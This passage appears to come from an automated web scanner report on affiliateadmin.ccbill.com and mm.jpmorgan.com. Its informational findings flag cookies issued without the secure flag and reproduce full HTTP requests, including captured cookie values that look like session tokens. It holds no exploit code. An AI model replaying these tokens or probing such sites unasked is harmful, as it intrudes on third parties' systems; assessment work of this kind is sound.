Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:23 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: TSd1de36=d97ed8a508837fe058fbda91f130c4f98e77874a1d1d18004e1c8129; Path=/
Content-Length: 3183

<html>
<head>
<link rel="stylesheet" href="/ccbill.css">
<title>CCBill.com Affiliate Admin</title>
</head>
<body>

<table border="0" class="OuterLogin" width="100%" height="100%">
<tr>
<td
...[SNIP]...

7.55. https://affiliateadmin.ccbill.com/ccbill.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://affiliateadmin.ccbill.com
Path:   /ccbill.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccbill.css HTTP/1.1
Host: affiliateadmin.ccbill.com
Connection: keep-alive
Referer: https://affiliateadmin.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSd1de36=d97ed8a508837fe058fbda91f130c4f98e77874a1d1d18004e1c8129

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:23 GMT
Last-Modified: Mon, 24 Sep 2007 20:23:40 GMT
ETag: "40dd6-4266-43ae76567cb00"
Accept-Ranges: bytes
Content-Length: 16998
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TSd1de36=d97ed8a508837fe058fbda91f130c4f98e77874a1d1d18004e1c8129; Path=/

BODY {
scrollbar-face-color: #3876b3;
scrollbar-highlight-color: #d7d7d7;
scrollbar-3dlight-color: #cccccc;
scrollbar-darkshadow-color: #666666;
s
...[SNIP]...

7.56. https://affiliateadmin.ccbill.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://affiliateadmin.ccbill.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: affiliateadmin.ccbill.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSd1de36=d97ed8a508837fe058fbda91f130c4f98e77874a1d1d18004e1c8129

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:25 GMT
Last-Modified: Thu, 28 Jun 2007 17:58:59 GMT
ETag: "e7d61-1-433fb1df13ec0"
Accept-Ranges: bytes
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1
Set-Cookie: TSd1de36=d97ed8a508837fe058fbda91f130c4f98e77874a1d1d18004e1c8129; Path=/



7.57. https://mm.jpmorgan.com/css/menu.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /css/menu.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/menu.css HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:47 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"5331-1310119392000"
Last-Modified: Fri, 08 Jul 2011 10:03:12 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:47 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 5331
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

#jpmmenu {
   height: 27px;
   width: 100%;
   position: relative;
   font-family: arial;
   font-size: 11px;
   z-index: 500;
   clear: both;
}

#jpmmenu .select {
   margin: 0;
   padding: 0;
   list-style
...[SNIP]...

7.58. https://mm.jpmorgan.com/css/morganmarkets.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /css/morganmarkets.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/morganmarkets.css HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:49 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"54402-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:49 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 54402
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/* start jpm base css changes */
body {
   margin: 0;
}

ul li {
   list-style: none outside none;
}

th,td {
   border: none;
}

/* end jpm base css changes */
   /* start jpm reset-fonts-grids
...[SNIP]...

7.59. https://mm.jpmorgan.com/css/yui/base.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /css/yui/base.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/yui/base.css HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:47 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"917-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:47 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 917
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
body{margin:10px;}h1{font-size:138.5%;}
...[SNIP]...

7.60. https://mm.jpmorgan.com/css/yui/button.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /css/yui/button.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/yui/button.css HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:53 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"3664-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:53 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 3664
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
.yui-button{display:-moz-inline-box;display:i
...[SNIP]...

7.61. https://mm.jpmorgan.com/css/yui/container.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /css/yui/container.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/yui/container.css HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:54 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"4781-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:54 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 4781
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
.yui-overlay,.yui-panel-container{visib
...[SNIP]...

7.62. https://mm.jpmorgan.com/css/yui/reset-fonts-grids.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /css/yui/reset-fonts-grids.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/yui/reset-fonts-grids.css HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:53 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"5745-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:53 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 5745
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
html{color:#000;background:#FFF;}body,d
...[SNIP]...

7.63. https://mm.jpmorgan.com/css/yui/sprite.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /css/yui/sprite.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/yui/sprite.png HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:30:26 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"4761-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=3600
Expires: Tue, 12 Jul 2011 17:30:26 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 4761
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/png

.PNG
.
...IHDR...(............M....gAMA......a.....PLTE...:%.=)."""..K..j.$w-+k@+!A-"D0%F2(H5+J6,L9/N<2Q>4R@6UB9WE<YH>III[I@]LC_NFbRIfUMfffjjjmmmsss $.%+.$*.(1..7./>.;C.3C.:M.<Q.DY.Rc.wt.~.Mh.Qo
...[SNIP]...

7.64. https://mm.jpmorgan.com/css/yui/tabview.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /css/yui/tabview.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/yui/tabview.css HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:55 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"6532-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:55 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 6532
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
.yui-navset .yui-nav li,.yui-navset .yu
...[SNIP]...

7.65. https://mm.jpmorgan.com/css/yui/treeview.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /css/yui/treeview.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/yui/treeview.css HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:53 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"5077-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:53 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 5077
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
table.ygtvtable{margin-bottom:0;border:
...[SNIP]...

7.66. https://mm.jpmorgan.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 302 Found
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:30:00 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Location: https://iblogin.jpmorgan.com/sso/action/federateLogin?URI=https%3a%2f%2fmm.jpmorgan.com%3a443%2ffavicon.ico&msg=+&securityLevel=0&cs=V05Mtro7P%2f8lpwB5gAv4hsgbAKM%3d
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:35:00 GMT
Vary: Accept-Encoding
Content-Length: 361
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://iblogin.jpmorgan.com/sso/action/federat
...[SNIP]...

7.67. https://mm.jpmorgan.com/images/JPM_logo.gif  previous  next

Summary

Severity:   Information
